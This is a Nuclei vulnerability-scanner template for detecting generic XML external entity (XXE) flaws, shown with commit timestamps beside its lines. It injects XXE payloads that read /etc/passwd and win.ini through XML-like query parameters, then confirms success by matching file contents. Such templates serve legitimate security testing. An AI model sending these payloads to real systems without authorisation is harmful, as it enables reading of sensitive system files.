2024-04-08 06:45:08 +00:00
|
|
|
id: generic-xxe
|
2024-03-16 18:44:49 +00:00
|
|
|
|
|
|
|
info:
|
2024-04-08 06:45:08 +00:00
|
|
|
name: Generic XML external entity (XXE)
|
2024-03-16 18:44:49 +00:00
|
|
|
author: pwnhxl
|
|
|
|
severity: medium
|
|
|
|
reference:
|
|
|
|
- https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py
|
2024-06-07 10:04:29 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2024-03-23 09:32:51 +00:00
|
|
|
tags: dast,xxe
|
2024-03-16 18:44:49 +00:00
|
|
|
|
|
|
|
variables:
|
|
|
|
rletter: "{{rand_base(6,'abc')}}"
|
|
|
|
|
|
|
|
http:
|
2024-03-31 19:55:42 +00:00
|
|
|
- pre-condition:
|
2024-03-26 07:21:56 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'method == "GET"'
|
2024-03-16 18:44:49 +00:00
|
|
|
|
|
|
|
payloads:
|
|
|
|
xxe:
|
|
|
|
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:///c:/windows/win.ini"> ]><x>&{{rletter}};</x>'
|
|
|
|
- '<!DOCTYPE {{rletter}} [ <!ENTITY {{rletter}} SYSTEM "file:////etc/passwd"> ]><x>&{{rletter}};</x>'
|
|
|
|
|
|
|
|
fuzzing:
|
|
|
|
- part: query
|
|
|
|
keys-regex:
|
|
|
|
- "(.*?)xml(.*?)"
|
|
|
|
fuzz:
|
|
|
|
- "{{xxe}}"
|
|
|
|
|
|
|
|
- part: query
|
|
|
|
values:
|
|
|
|
- "(<!DOCTYPE|<?xml|%3C!DOCTYPE|%3C%3Fxml)(.*?)>"
|
|
|
|
fuzz:
|
|
|
|
- "{{xxe}}"
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: or
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
name: linux
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- 'root:.*?:[0-9]*:[0-9]*:'
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
name: windows
|
|
|
|
part: body
|
|
|
|
words:
|
2024-04-08 07:07:11 +00:00
|
|
|
- 'for 16-bit app support'
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 490a0046304402200765457e7ce86f2875c9b0446d1e4d4a3f035e95c8cb70d2c685bed047e1883c022000fb0dbfce1acce174129de4808904972d457aae4cc27dd68672d8e5a14d49b1:922c64590222798bb761d5b6d8e72950
|